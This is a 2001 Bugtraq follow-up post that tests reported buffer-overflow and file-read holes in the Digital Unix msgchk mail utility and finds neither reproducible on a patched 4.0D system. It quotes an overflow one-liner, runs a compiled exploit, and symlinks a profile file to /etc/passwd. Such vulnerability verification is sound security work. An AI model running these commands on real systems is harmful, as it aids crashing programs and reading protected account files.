FW: Digital Unix 4.0x msgchk multiple vulnerabilities

["Boyce, Nick" <nick.boyce () eds com>]

[Resend:  my original reply to Bugtraq on Monday 10th has not appeared, and
I haven't seen any other followup;  this time I've replaced all weird >
ASCII 127 characters in my screen dumps by X's in case that prevented my
email's handling by some MTA somewhere]

On 10 September 2001 03:54, SeungHyun Seo said :

> there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital
> unix 4.0x. it's a mail utility - check for messages (only available within
the
> message handlin  system, mh)
[...]
> /usr/bin/mh/msgchk is affected to buffer overflow vulnerability
>
>  -- snip --
>   $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
>   AAAAAAAAAAAAA ... ...
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA : 
>    msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
> AAAAAAAAAAAAAAAAAAAAAAA
>   Memory fault(coredump)
>  -- snip --

NOT confirmed.  On my system (Digital Unix 4.0D, Patch Kit 5) this gives me
:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAA :
   msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
followed by another command prompt.


And the exploit doesn't work :

/usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std
/usr/users/joesoap/bin>msgbreak
I'm going to create the standard MH path for you.
AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 .... [lots of pairs of "G" followed by "y" with an upsilon accent]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 .... [even more A's]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX :
   msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/usr/users/joesoap/bin>whoami
joesoap
/usr/users/joesoap/bin>uname -a
OSF1 mybox V4.0 878 alpha

(Lines wrapped for readability, and unprintable blobs replaced by X's.)

Looks like there must have been a patch for this somewhere in Patch Kits 1
thru 5.  
Or maybe the hole only exists *prior* to 4.0D.



Part 2:

>  Next , /usr/bin/mh/msgchk has a vulnerability that anyone read  1 line  
>  of the unprivileged file on the system it's a old bug on redhat linux
2.0,
>  but it also works on digital unix 4.0x

This hole doesn't work either :

/usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile
/usr/users/joesoap>/usr/bin/mh/msgchk
joesoap :
   No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST

/usr/users/joesoap>head -2 ./~mh_profile
root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:


Nick Boyce
EDS, Bristol, UK